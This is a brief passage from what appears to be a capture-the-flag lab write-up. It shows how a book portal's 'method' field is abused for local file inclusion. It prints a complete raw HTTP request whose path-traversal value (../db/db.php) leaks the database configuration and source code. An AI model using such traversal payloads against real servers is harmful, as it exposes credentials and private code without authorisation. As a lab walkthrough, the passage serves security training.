Exploiting LFI
Upon intercepting the requests with Burp Suite, we see that the website has an interesting request field named method
.
Changing the method
field from 0
to 1
throws an error message about a missing book
field.
Exploit Code
Using Burp Suite, we can control the book
field, together with the ffuf results, to perform LFI and leak the source code of the book portal as well as the admin portal.
Here, we can read the content of the database config - db.php
.
POST /includes/bookController.php HTTP/1.1
Host: 10.10.10.228
Content-Length: 42
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://10.10.10.228
Referer: http://10.10.10.228/php/books.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=test1e9549a0bf4b172e168a9ca5cbaa6fdb; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoidGVzdCJ9fQ.wO1HzPNOz55oU02jJT2wXL7Mvi0JNSB353p6Mgk3o7Y
Connection: close
title=&author=a&book=../db/db.php&method=1
We can thus proceed to read the various source code to see if anything important are revealed.